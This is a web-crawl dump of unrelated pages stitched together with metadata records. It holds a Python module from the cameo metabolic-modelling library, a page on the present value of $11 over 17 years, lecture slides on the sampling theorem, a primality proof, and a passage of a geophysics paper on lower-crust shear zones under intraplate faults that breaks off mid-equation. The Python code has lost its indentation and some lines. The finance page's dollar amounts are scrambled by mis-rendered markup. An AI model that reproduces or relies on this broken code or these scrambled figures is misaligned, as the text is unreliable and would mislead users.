{"ft_lang_label":"__label__en","ft_lang_prob":0.865105,"math_prob":0.5649484,"size":846,"snap":"2023-40-2023-50","text_gpt3_token_len":203,"char_repetition_ratio":0.1152019,"word_repetition_ratio":0.2769231,"special_character_ratio":0.21513002,"punctuation_ratio":0.11612903,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95542026,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-30T17:55:54Z\",\"WARC-Record-ID\":\"<urn:uuid:eb01b561-2c87-4df1-96dd-b47670661c05>\",\"Content-Length\":\"110430\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1773054-047b-4bda-96fc-97535b8201f1>\",\"WARC-Concurrent-To\":\"<urn:uuid:9e69afeb-4222-4d13-85cd-34f5dc0c7e1f>\",\"WARC-IP-Address\":\"35.186.214.25\",\"WARC-Target-URI\":\"https://gas-dd.sagepub.com/lp/springer-journals/a-solution-to-parabolic-system-with-the-fractional-laplacian-rVAx5SW0yM\",\"WARC-Payload-Digest\":\"sha1:G6JDMEJABF6HLLMHL5IA4NRPLLYZR35D\",\"WARC-Block-Digest\":\"sha1:XRH2PCZYJBYWXGHNFJV4RABDB6IDL7N6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510697.51_warc_CC-MAIN-20230930145921-20230930175921-00779.warc.gz\"}"}
http://cameo.bio/_modules/cameo/flux_analysis/util.html
[ "# Source code for cameo.flux_analysis.util\n\n# -*- coding: utf-8 -*-\n# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.\n#\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\n# Unless required by applicable law or agreed to in writing, software\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n\nfrom cobra.exceptions import OptimizationError\n\nimport sympy\n\nimport logging\n\n__all__ = ['remove_infeasible_cycles', 'fix_pfba_as_constraint']\n\nFloatOne = sympy.Float(1)\nlogger = logging.getLogger(__name__)\n\n[docs]def remove_infeasible_cycles(model, fluxes, fix=()):\n\"\"\"Remove thermodynamically infeasible cycles from a flux distribution.\n\nParameters\n---------\nmodel : cobra.Model\nThe model that generated the flux distribution.\nfluxes : dict\nThe flux distribution containing infeasible loops.\n\nReturns\n-------\ndict\nA cycle free flux distribution.\n\nReferences\n----------\n.. \tA. A. Desouki, F. Jarre, G. Gelius-Dietrich, and M. J. Lercher, “CycleFreeFlux: efficient removal of\nthermodynamically infeasible loops from flux distributions.”\n\"\"\"\nwith model:\n# make sure the original object is restored\nexchange_reactions = model.boundary\nexchange_ids = [exchange.id for exchange in exchange_reactions]\ninternal_reactions = [reaction for reaction in model.reactions if reaction.id not in exchange_ids]\nfor exchange in exchange_reactions:\nexchange_flux = fluxes[exchange.id]\nexchange.bounds = (exchange_flux, exchange_flux)\ncycle_free_objective_list = []\nfor internal_reaction in internal_reactions:\ninternal_flux = fluxes[internal_reaction.id]\nif internal_flux >= 0:\ncycle_free_objective_list.append(Mul._from_args((FloatOne, internal_reaction.forward_variable)))\ninternal_reaction.bounds = (0, internal_flux)\nelse: # internal_flux < 0:\ncycle_free_objective_list.append(Mul._from_args((FloatOne, internal_reaction.reverse_variable)))\ninternal_reaction.bounds = (internal_flux, 0)\ncycle_free_objective = model.solver.interface.Objective(\n)\nmodel.objective = cycle_free_objective\n\nfor reaction_id in fix:\nreaction_to_fix = model.reactions.get_by_id(reaction_id)\nreaction_to_fix.bounds = (fluxes[reaction_id], fluxes[reaction_id])\ntry:\nsolution = model.optimize(raise_error=True)\nexcept OptimizationError as e:\nlogger.warning(\"Couldn't remove cycles from reference flux distribution.\")\nraise e\nresult = solution.fluxes\nreturn result\n\n[docs]def fix_pfba_as_constraint(model, multiplier=1, fraction_of_optimum=1):\n\"\"\"Fix the pFBA optimum as a constraint\n\nUseful when setting other objectives, like the maximum flux through given reaction may be more realistic if all\nother fluxes are not allowed to reach their full upper bounds, but collectively constrained to max sum.\n\nParameters\n----------\nmodel : cobra.Model\nThe model to add the pfba constraint to\nmultiplier : float\nThe multiplier of the minimal sum of all reaction fluxes to use as the constraint.\nfraction_of_optimum : float\nThe fraction of the objective value's optimum to use as constraint when getting the pFBA objective's minimum\n\"\"\"\n\nfix_constraint_name = '_fixed_pfba_constraint'\nif fix_constraint_name in model.solver.constraints:\nmodel.solver.remove(fix_constraint_name)\nwith model:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6535421,"math_prob":0.73657006,"size":3966,"snap":"2019-51-2020-05","text_gpt3_token_len":904,"char_repetition_ratio":0.16456336,"word_repetition_ratio":0.00456621,"special_character_ratio":0.22440746,"punctuation_ratio":0.20302014,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9652561,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-05T14:52:50Z\",\"WARC-Record-ID\":\"<urn:uuid:df06d944-3376-4f73-9613-5ac375c91342>\",\"Content-Length\":\"19871\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d6ef547d-f7ff-4756-96be-779a0d11d0d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:178427d2-5d91-4cad-a2c8-65a74545f051>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"http://cameo.bio/_modules/cameo/flux_analysis/util.html\",\"WARC-Payload-Digest\":\"sha1:TOCWB45Z6PVL6QG4VYBHT7TWE3XIZDCO\",\"WARC-Block-Digest\":\"sha1:UGIA3C42YBKXGAFWSA5A4UY26XOCEHL7\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540481076.11_warc_CC-MAIN-20191205141605-20191205165605-00154.warc.gz\"}"}
https://studyfinance.com/present-value/11-in-17-years/
[ "# Present Value of $11 in 17 Years When you have a single payment that will be made to you, in this case$11, and you know that it will be paid in a certain number of years, in this case 17 years, you can use the present value formula to calculate what that $11 is worth today. Below is the present value formula we'll use to calculate the present value of$11 in 17 years.\n\n$$Present\\: Value = \\dfrac{FV}{(1 + r)^{n}}$$\n\nWe already have two of the three required variables to calculate this:\n\n• Future Value (FV): This is the $11 • n: This is the number of periods, which is 17 years So what we need to know now is r, which is the discount rate (or rate of return) to apply. It's worth noting that there is no correct discount rate to use here. It's a very personal number than can vary depending on the risk of your investments. For example, if you invest in the market and you earn on average 8% per year, you can use that number for the discount rate. You can also use a lower discount rate, based on the US Treasury ten year rate, or some average of the two. The table below shows the present value (PV) of$11 paid in 17 years for interest rates from 2% to 30%.\n\nAs you will see, the present value of $11 paid in 17 years can range from$0.13 to $7.86. Discount Rate Future Value Present Value 2%$11 $7.86 3%$11 $6.66 4%$11 $5.65 5%$11 $4.80 6%$11 $4.09 7%$11 $3.48 8%$11 $2.97 9%$11 $2.54 10%$11 $2.18 11%$11 $1.87 12%$11 $1.60 13%$11 $1.38 14%$11 $1.19 15%$11 $1.02 16%$11 $0.88 17%$11 $0.76 18%$11 $0.66 19%$11 $0.57 20%$11 $0.50 21%$11 $0.43 22%$11 $0.37 23%$11 $0.33 24%$11 $0.28 25%$11 $0.25 26%$11 $0.22 27%$11 $0.19 28%$11 $0.17 29%$11 $0.14 30%$11 $0.13 As mentioned above, the discount rate is highly subjective and will have a big impact on the actual present value of$11. A 2% discount rate gives a present value of $7.86 while a 30% discount rate would mean a$0.13 present value.\n\nThe rate you choose should be somewhat equivalent to the expected rate of return you'd get if you invested $11 over the next 17 years. Since this is hard to calculate, especially over longer periods of time, it is often useful to look at a range of present values (from 5% discount rate to 10% discount rate, for example) when making decisions. Hopefully this article has helped you to understand how to make present value calculations yourself. You can also use our quick present value calculator for specific numbers. ### Link To or Reference This Page If you found this content useful in your research, please do us a great favor and use the tool below to make sure you properly reference us wherever you use it. We really appreciate your support! • \"Present Value of$11 in 17 Years\". StudyFinance.com. Accessed on September 16, 2021. https://studyfinance.com/present-value/11-in-17-years/.\n\n• \"Present Value of $11 in 17 Years\". StudyFinance.com, https://studyfinance.com/present-value/11-in-17-years/. Accessed 16 September, 2021 • Present Value of$11 in 17 Years. StudyFinance.com. Retrieved from https://studyfinance.com/present-value/11-in-17-years/." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9205836,"math_prob":0.9837102,"size":2500,"snap":"2021-31-2021-39","text_gpt3_token_len":804,"char_repetition_ratio":0.19951923,"word_repetition_ratio":0.012987013,"special_character_ratio":0.402,"punctuation_ratio":0.118584074,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99817127,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-16T10:27:23Z\",\"WARC-Record-ID\":\"<urn:uuid:fa653840-e293-490b-96c2-2c2506db3f63>\",\"Content-Length\":\"20131\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c1c16763-c450-4506-a969-b71180ed1a38>\",\"WARC-Concurrent-To\":\"<urn:uuid:206b38f9-1b55-44c0-be38-bc6ef880374b>\",\"WARC-IP-Address\":\"172.67.142.85\",\"WARC-Target-URI\":\"https://studyfinance.com/present-value/11-in-17-years/\",\"WARC-Payload-Digest\":\"sha1:XZAN5YHB4RKZQNL7LNJK4WYUDOUZUXIW\",\"WARC-Block-Digest\":\"sha1:H3K5C3VZPNIRCMQYIGENP3ACUXORD4H2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780053493.41_warc_CC-MAIN-20210916094919-20210916124919-00202.warc.gz\"}"}
https://slideplayer.com/slide/6240987/
[ "", null, "# … Representation of a CT Signal Using Impulse Functions\n\n## Presentation on theme: \"… Representation of a CT Signal Using Impulse Functions\"— Presentation transcript:\n\nLECTURE 15: THE SAMPLING THEOREM\nObjectives: Representation Using Impulses FT of a Sampled Signal Signal Reconstruction Signal Interpolation Aliasing Multirate Signal Processing Resources: Wiki: Nyquist Sampling Theorem CNX: The Sampling Theorem CNX: Downsampling MS Equation 3.0 was used with settings of: 18, 12, 8, 18, 12. URL: Audio:\n\n… Representation of a CT Signal Using Impulse Functions\nThe goal of this lecture is to convince you that bandlimited CT signals, when sampled properly, can be represented as discrete-time signals with NO loss of information. This remarkable result is known as the Sampling Theorem. Recall our expression for a pulse train: A sampled version of a CT signal, x(t), is: This is known as idealized sampling. We can derive the complex Fourier series of a pulse train: t x(t) -2T -T T 2T ]i=k,\n\nFourier Transform of a Sampled Signal\nThe Fourier series of our sampled signal, xs(t) is: Recalling the Fourier transform properties of linearity (the transform of a sum is the sum of the transforms) and modulation (multiplication by a complex exponential produces a shift in the frequency domain), we can write an expression for the Fourier transform of our sampled signal: If our original signal, x(t), is bandlimited:\n\nSignal Reconstruction\nNote that if , the replicas of do not overlap in the frequency domain. We can recover the original signal exactly. The sampling frequency, , is referred to as the Nyquist sampling frequency. There are two practical problems associated with this approach: The lowpass filter is not physically realizable. Why? The input signal is typically not bandlimited. Explain.\n\nSignal Interpolation The frequency response of the lowpass, or interpolation, filter is: The impulse response of this filter is given by: The output of the interpolating filter is given by the convolution integral: Using the sifting property of the impulse:\n\nSignal Interpolation (Cont.)\nInserting our expression for the impulse response: This has an interesting graphical interpretation shown to the right. This formula describes a way to perfectly reconstruct a signal from its samples. Applications include digital to analog conversion, and changing the sample frequency (or period) from one value to another, a process we call resampling (up/down). But remember that this is still a noncausal system so in practical systems we must approximate this equation. Such implementations are studied more extensively in an introductory DSP class.\n\nAliasing Recall that a time-limited signal cannot be bandlimited. Since all signals are more or less time-limited, they cannot be bandlimited. Therefore, we must lowpass filter most signals before sampling. This is called an anti-aliasing filter and are typically built into an analog to digital (A/D) converter. If the signal is not bandlimited distortion will occur when the signal is sampled. We refer to this distortion as aliasing: How was the sample frequency for CDs and MP3s selected?\n\nSampling of Narrowband Signals\nWhat is the lowest sample frequency we can use for the narrowband signal shown to the right? Recalling that the process of sampling shifts the spectrum of the signal, we can derive a generalization of the Sampling Theorem in terms of the physical bandwidth occupied by the signal. A general guideline is , where B = B2 – B1. A more rigorous equation depends on B1 and B2: Sampling can also be thought of as a modulation operation, since it shifts a signal’s spectrum in frequency.\n\nUndersampling and Oversampling of a Signal\n\nSampling is a Universal Engineering Concept\nNote that the concept of sampling is applied to many electronic systems: electronics: CD players, switched capacitor filters, power systems biological systems: EKG, EEG, blood pressure information systems: the stock market. Sampling can be applied in space (e.g., images) as well as time, as shown to the right. Full-motion video signals are sampled spatially (e.g., 1280x1024 pixels at 100 pixels/inch) , temporally (e.g., 30 frames/sec), and with respect to color (e.g., RGB at 8 bits/color). How were these settings arrived at?\n\nDownsampling and Upsampling\nSimple sample rate conversions, such as converting from 16 kHz to 8 kHz, can be achieved using digital filters and zero-stuffing:\n\nOversampling Sampling and digital signal processing can be combined to create higher performance samplers  For example, CD players use an oversampling approach that involves sampling the signal at a very high rate and then downsampling it to avoid the need to build high precision converter and filters.\n\nSummary Introduced the Sampling Theorem and discussed the conditions under which analog signals can be represented as discrete-time signals with no loss of information. Discussed the spectrum of a discrete-time signal. Demonstrated how to reconstruct and interpolate a signal using sinc functions that are a consequence of the Sampling Theorem. Introduced a variety of applications involving sampling including downsampling and oversampling." ]
[ null, "https://slideplayer.com/static/blue_design/img/slide-loader4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9174113,"math_prob":0.9565479,"size":5217,"snap":"2019-51-2020-05","text_gpt3_token_len":1100,"char_repetition_ratio":0.14214464,"word_repetition_ratio":0.007380074,"special_character_ratio":0.19973165,"punctuation_ratio":0.123157896,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9895407,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-20T13:10:44Z\",\"WARC-Record-ID\":\"<urn:uuid:bb8a41fc-12d4-4965-a004-6058f25ffad1>\",\"Content-Length\":\"172833\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4fd2712f-003a-4655-96a4-629773eb5da1>\",\"WARC-Concurrent-To\":\"<urn:uuid:cee23477-5293-4bc7-bed9-fde10d699977>\",\"WARC-IP-Address\":\"144.76.224.208\",\"WARC-Target-URI\":\"https://slideplayer.com/slide/6240987/\",\"WARC-Payload-Digest\":\"sha1:W3CR6FW6DTO75XW4XLESAIZADI3THNFL\",\"WARC-Block-Digest\":\"sha1:AQCGFG5VULJYW5VOXD2XFBZCIA53F37S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250598726.39_warc_CC-MAIN-20200120110422-20200120134422-00231.warc.gz\"}"}
https://safecurves.cr.yp.to/proof/4975457.html
[ "Primality proof for n = 4975457:\n\nTake b = 2.\n\nb^(n-1) mod n = 1.\n\n1747 is prime.\nb^((n-1)/1747)-1 mod n = 3301997, which is a unit, inverse 3640192.\n\n89 is prime.\nb^((n-1)/89)-1 mod n = 4668116, which is a unit, inverse 797003.\n\n(89 * 1747) divides n-1.\n\n(89 * 1747)^2 > n.\n\nn is prime by Pocklington's theorem." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.70147693,"math_prob":0.9988386,"size":305,"snap":"2023-40-2023-50","text_gpt3_token_len":129,"char_repetition_ratio":0.14617941,"word_repetition_ratio":0.036363635,"special_character_ratio":0.5704918,"punctuation_ratio":0.18181819,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9993274,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T12:06:01Z\",\"WARC-Record-ID\":\"<urn:uuid:78438b56-6073-449c-8b15-dd29b72dfc39>\",\"Content-Length\":\"584\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:06f3677d-9e33-4df9-9429-d4e4b0c3d537>\",\"WARC-Concurrent-To\":\"<urn:uuid:91e848b1-ce0e-4cda-9de9-95ea7c8ab2a0>\",\"WARC-IP-Address\":\"131.193.32.109\",\"WARC-Target-URI\":\"https://safecurves.cr.yp.to/proof/4975457.html\",\"WARC-Payload-Digest\":\"sha1:D4E7EDHCNHXLJ53E2PRGJLYDF5MFYSGT\",\"WARC-Block-Digest\":\"sha1:K6IWHBLTJRCDOQHIBFTCFJSEYK4CIHSJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100081.47_warc_CC-MAIN-20231129105306-20231129135306-00628.warc.gz\"}"}
https://earth-planets-space.springeropen.com/articles/10.1186/s40623-017-0668-5
[ "# Shear strain concentration mechanism in the lower crust below an intraplate strike-slip fault based on rheological laws of rocks\n\n• 1836 Accesses\n\n• 3 Citations\n\n## Abstract\n\nWe conduct a two-dimensional numerical experiment on the lower crust under an intraplate strike-slip fault based on laboratory-derived power-law rheologies considering the effects of grain size and water. To understand the effects of far-field loading and material properties on the deformation of the lower crust on a geological time scale, we assume steady fault sliding on the fault in the upper crust and ductile flow for the lower crust. To avoid the stress singularity, we introduce a yield threshold in the brittle–ductile transition near the down-dip edge of the fault. Regarding the physical mechanisms for shear strain concentration in the lower crust, we consider frictional and shear heating, grain size, and power-law creep. We evaluate the significance of these mechanisms in the formation of the shear zone under an intraplate strike-slip fault with slow deformation. The results show that in the lower crust, plastic deformation is possible only when the stress or temperature is sufficiently high. At a similar stress level, $$\\sim$$100 MPa, dry anorthite begins to undergo plastic deformation at a depth around 28–29 km, which is about 8 km deeper than wet anorthite. As a result of dynamic recrystallization and grain growth, the grain size in the lower crust may vary laterally and as a function of depth. A comparison of the results with constant and non-constant grain sizes reveals that the shear zone in the lower crust is created by power-law creep and is maintained by dynamically recrystallized material in the shear zone because grain growth occurs in a timescale much longer than the recurrence interval of intraplate earthquakes. Owing to the slow slip rate, shear and frictional heating have negligible effects on the deformation of the shear zone. The heat production rate depends weakly on the rock rheology; the maximum temperature increase over 3 Myr is only about several tens of degrees.\n\n## Introduction\n\nDuctile shear zones are believed to exist in the lower crust below interplate strike-slip faults on the basis of various observational, experimental, and theoretical studies as well as geological observations of exhumed shear zones. Thermal weakening due to shear heating has been considered as an important process for the development and maintenance of shear zones (e.g., Yuen et al. 1978; Fleitout and Froidevaux 1980). Observation of the broadly distributed heat flow anomaly on the San Andreas Fault (see Lachenbruch and Sass 1980) has been explained by shear heating in the lower crust. The temperature anomaly in the lower crust can reach several hundred degrees, which can create an observable heat flow anomaly on the surface (e.g., Thatcher and England 1998; Leloup et al. 1999; Takeuchi and Fialko 2012). A large temperature anomaly can result in a weak zone with low seismic velocity that can be observed as a heterogeneous velocity structure in the seismic tomography data (Wittlinger et al. 1998). Furthermore, mylonite outcrops of exhumed faults (White et al. 1980) provide direct evidence for the existence of ductile shear zones in the lower crust under interplate (e.g., Rutter 1999; Little et al. 2002) and intraplate faults (e.g., Shimada et al. 2004; Fusseis et al. 2006; Takahashi 2015).\n\nCompared with interplate faults, intraplate strike-slip faults have much smaller slip rates, at <1 mm/year, and their age is much younger in the Japanese Islands (less than 3 Myr; Doke et al. 2012). However, heterogeneous structures beneath intraplate strike-slip faults observed by seismic tomography (e.g., Nakajima and Hasegawa 2007; Nakajima et al. 2010) and magnetotelluric survey (e.g., Ogawa and Honkura 2004; Yoshimura et al. 2009) suggest the existence of localized weak zones in the lower crust just below intraplate active faults (Iio et al. 2002, 2004). The spatial resolution of these observations is insufficient to resolve the structures of such ductile shear zones. Therefore, understanding the mechanisms that lead to shear strain concentration in the lower crust beneath an intraplate strike-slip is an important step in understanding the deformation of the crust.\n\nIn this study, we construct a series of numerical models on the deformation in the lower crust below an active intraplate strike-slip fault based on laboratory-derived rheological laws. We simulate the evolution of viscosity and deformation patterns of the lower crust beneath an immature intraplate strike-slip fault on a geological timescale. We consider three mechanisms of strain localization: shear and fault frictional heating, grain size reduction, and power-law creep. The effect of water is quantitatively evaluated with water fugacity. We discuss the role of shear strain concentration mechanisms and boundary conditions in the development of the shear zone. In addition, we compare the shear zones beneath intraplate and interplate strike-slip faults to identify the controlling factors for lower crustal shear localization under intraplate strike-slip faults.\n\n## Model description\n\nWe simulated the deformation of the lower crust beneath an intraplate strike-slip fault by applying a velocity boundary condition representing far-field loading. We solved the stress equilibrium equation and the heat flow equation for a thermo-mechanical coupled model, and we used laboratory-derived rheological laws to control the behavior of rocks.\n\n### Model geometry\n\nThe model domain is 35 km thick in the vertical (z) direction and 30 km wide in the fault-normal (x) direction. The Mohorovičić (Moho) discontinuity is represented by a horizontal boundary at a depth of 35 km. Following Thatcher and England (1998), we considered the problem in a 2-D plane perpendicular to the fault trace, as shown in Fig. 1. We assumed two layers: a rigid upper crust and a ductile lower crust, and the entire crust is composed of wet or dry anorthite. In the upper crust where brittle failure is the dominant mode of deformation, an infinitely long vertical creeping fault is assumed with the fault strike parallel to the y-axis. The lower crust is deformed by plastic flow, and there is a semi-brittle regime between the upper and the lower crust. The lower boundary of the semi-brittle regime is the brittle–ductile transition (BDT), the depth of which depends on the assumption of crustal rheology (Table 1). Considering the symmetry of the vertical strike-slip fault, our model region includes only one side of the fault bounded by the surface and a vertical plane of bilateral symmetry, which is taken to be the center of the shear zone.\n\n### Rheology\n\nThe constitutive relation for the plastic flow of rocks is described as follows (e.g., Bürgmann and Dresen 2008):\n\n\\begin{aligned} \\dot{\\varepsilon } = A \\tau _{{\\rm s}}^{n} L^{-m} f_{{\\rm H_{2}O}}^{r} {{\\rm exp}}\\left(-\\dfrac{Q+pV}{RT} \\right) , \\end{aligned}\n(1)\n\nwhere $$\\tau _{\\rm s}$$ is the maximum shear stress given by the square root of the second deviatoric stress invariant. L is the grain size. $$f_{{\\rm H_{2}O}}$$ is water fugacity. Q and V are activation energy and activation volume, respectively. R is the universal gas constant. p is pressure, and A, n, m, r are material constants. The laboratory-derived parameters for anorthite are summarized in Table 2. Regarding the physical mechanism of plastic flow, in this study, we considered both diffusion creep and dislocation creep. For a given mineral, we assume that the same shear stress controls the two deformation mechanisms (e.g., Gueydan et al. 2001; Montési and Hirth 2003). Under this assumption, the total strain rate $$\\dot{\\varepsilon }_{\\rm total}$$ is expressed as the sum of the diffusion creep strain rate $$\\dot{\\varepsilon }_{\\rm diff}$$ and the strain rate caused by dislocation creep $$\\dot{\\varepsilon }_{\\rm disl}$$.\n\n\\begin{aligned} \\dot{\\varepsilon }_{{\\rm total}}=\\dot{\\varepsilon }_{{\\rm diff}}+ \\dot{\\varepsilon }_{{\\rm disl}} \\end{aligned}\n(2)\n\nOne can define the effective viscosity, such that\n\n\\begin{aligned} \\eta _{{\\rm eff}}=\\dfrac{\\tau _{s}}{\\dot{\\varepsilon }_{{\\rm total}}}. \\end{aligned}\n(3)\n\nThe grain size in this study is assumed following the model proposed by Bresser et al. (1998), who argued that grain growth occurs in the diffusion creep regime to increase the grain size to a size sufficient for dislocation creep to occur and dynamic recrystallization in dislocation creep regime leads to a grain size small enough for diffusion creep to occur. They postulated that the grain size is determined by the equation for Equilibrium Grain Size ($$L_{{\\rm EGS}}$$):\n\n\\begin{aligned} \\dot{\\varepsilon }_{{\\rm diff}}(T,p,\\tau ,L)=\\dot{\\varepsilon }_{{\\rm disl}}(T,p,\\tau ) \\end{aligned}\n(4)\n\nwhere T is temperature, p is pressure,$$\\tau$$ is shear stress, and L is grain size. Combining Eqs. 1 and 4, we can obtain the expression for $$L_{{\\rm EGS}}$$, which is a function of temperature and shear stress:\n\n\\begin{aligned} L_{{\\rm EGS}}=\\left[ \\dfrac{A_{{\\rm diff}}}{A_{{\\rm disl}}\\tau ^{n_{{\\rm disl}}-1}_{s}} {{\\rm exp}}\\left(\\dfrac{Q_{{\\rm disl}}+pV_{{\\rm disl}}-Q_{{\\rm diff}}-pV_{{\\rm diff}}}{RT}\\right) \\right] ^{\\dfrac{1}{m_{{\\rm diff}}}} \\end{aligned}\n(5)\n\nThe subscript diff and disl refer to the rheological parameters for diffusion creep and dislocation creep in Table 2. From this assumption, we expect a large variation in grain size under the thermal and stress conditions of the lower crust (Fig. 2). We also tested a case of a Constant Grain Size ($$L_{\\rm CGS}$$) of 500 $$\\upmu {\\mathrm{m}}$$ for comparison.\n\nFor wet rheology (r = 1), the effect of water weakening is evaluated with water fugacity $$f_{{\\rm H_{2}O}}$$. The fugacity of a gaseous species at any temperature (T) and pressure (p) can be calculated from the equation of state using the following equation (Karato 2012):\n\n\\begin{aligned} \\log \\dfrac{f(p,T)}{p}=\\dfrac{1}{RT} \\lim _{p_{0} \\rightarrow 0} \\int _{p_{0}}^{p} \\left(V_{{\\rm m}}(p^{\\prime},T)-V_{{\\rm m}}^{{\\rm id}}(p^{\\prime},T)\\right) dp^{\\prime}. \\end{aligned}\n(6)\n\nwhere $$V_{\\rm m}$$ and $$V_{\\rm m}^{\\rm id}$$ is molar volume of an real gas and an ideal gas, respectively. For real gas, we use van der Waals equation of state: $$p=\\dfrac{RT}{V_{{\\rm m}}-b}-\\dfrac{a}{V_{{\\rm m}}^{2}}$$. The van der Waals constants a and b of water ($${\\mathrm{H}}_2\\mathrm{O}$$) are $$5.537\\times 10^{-1} \\mathrm{m}^{6}\\,\\mathrm{Pa\\, mol}^{-2}$$ and $$3.049 \\times 10^{-5} \\mathrm{m}^{3}\\,\\mathrm{mol}^{-1}$$, respectively. $$V_{\\rm m}$$ in term $$\\dfrac{a}{V_{m}^{2}}$$ can be approximated as $$\\dfrac{RT}{p}$$ as ideal gas. Then, $$V_{{\\rm m}}$$ can be calculated as $$V_{{\\rm m}}=\\dfrac{R^{3}T^{3}}{pR^{2}T^{2}+ap^{2}}+b.$$ Integrating Eq. 6 using the equation of state for real gas and ideal gas and substitute p and $$p_{0}$$ for $$p^{\\prime}$$. Let $$p_{0}=0$$, one obtains the expression for fugacity,\n\n\\begin{aligned} f(p,T)=\\dfrac{pR^{2}T^{2}}{R^{2}T^{2}+{{\\rm ap}}}{{\\rm exp}}\\left(\\dfrac{bp}{RT}\\right) . \\end{aligned}\n(7)\n\n### Initial and boundary conditions\n\nBecause we consider an infinitely long strike-slip fault that cuts through the entire upper crust and terminates in the lower crust, there is no vertical motion. Far-field horizontal velocity $$v_{0}$$ is half of the total relative velocity. $$v_{0}$$ is assumed to be 0.5 and 15 mm/year for intraplate and interplate faults, respectively, and it is applied from surface to the depth of $$z_{{\\rm b}}$$ and on the far-field boundaries. We assume the fault strength in the brittle fracture regime on the basis of Byerlee’s law (Byerlee 1978):\n\n\\begin{aligned} \\tau _{f} = {\\left\\{ \\begin{array}{ll} 0.85 \\sigma _{{\\rm n}} &{} (\\sigma _{{\\rm n}}<200\\, [\\text{MPa}]) \\\\ 50+0.6\\sigma _{{\\rm n}} &{}(200\\, [\\text{MPa}]<\\sigma _{{\\rm n}}<1700\\, [\\text{MPa}]), \\end{array}\\right. } \\end{aligned}\n(8)\n\nwhere $$\\tau _{{\\rm f}}$$ is frictional strength and $$\\sigma _{{\\rm n}}$$ is normal stress. The strength of a material in the plastic flow regime is highly sensitive to temperature, as shown in Eq. 1. In this model, we assume that the brittle fracture and plastic flow occur independently; as a result, the mechanism that gives a lower strength becomes the dominant mechanism of deformation. The transition conditions for brittle fracture to plastic flow (brittle–ductile transition, BDT) are given by\n\n\\begin{aligned} \\tau _{yx}=\\dfrac{1}{2}\\eta _{{\\rm eff}}\\dfrac{\\partial v}{\\partial x}= \\tau _{{\\rm f}}. \\end{aligned}\n(9)\n\nShear stress $$\\tau _{yx}$$ is solved from the model of plastic flow using different model configurations (Table 1), and $$\\tau _{{\\rm f}}$$ is the fault frictional strength. The shear strain rate ($$\\dot{\\varepsilon }_{yx}$$) is solved from Eq. 9. At the depth shallower than the depth of BDT, we apply stress boundary condition on the fault that the flow stress is equal to the fault frictional strength (Fig. 3b). The fault gradually terminates as slip decreases with depth. At the depth of BDT, the slip rate is 0. Slip rate at semi-brittle regime can be calculated by the integral of the shear strain rate ($$\\dot{\\varepsilon }_{yx}$$) over the entire domain in the x-direction. At depths greater than the BDT, no brittle fracture occurs, and the deformation is fully plastic. The velocity on the vertical plane of bilateral symmetry is zero. On the crust/mantle boundary, the boundary condition is $${{\\rm d}}v/{{\\rm d}}z = 0$$.\n\nThe initial temperature is assumed with a uniform thermal gradient of 25 K/km (Table 3). The temperature of the Earth's surface is fixed to 0 °C. Zero heat flux at the vertical boundaries and a constant heat flux ($$0.065\\,\\hbox{W m}^{-2}$$) at the Moho is assumed.\n\n### Thermo-mechanical coupling model\n\nIn our model, all mechanical energy is dissipated in heat and represents a source term in the heat flow equation:\n\n\\begin{aligned} \\rho C_{{\\rm p}} \\dfrac{\\partial T}{\\partial t}=k \\left( \\dfrac{\\partial ^{2} T}{\\partial x^{2}}+\\dfrac{\\partial ^{2}T}{\\partial z^{2}} \\right) +H_{{\\rm s}}+H_{{\\rm f}}, \\end{aligned}\n(10)\n\nwhere the change in temperature T is a summation of thermal diffusion (k is the thermal conductivity) and volumetric heat generated by shear heating ($$H_{{\\rm 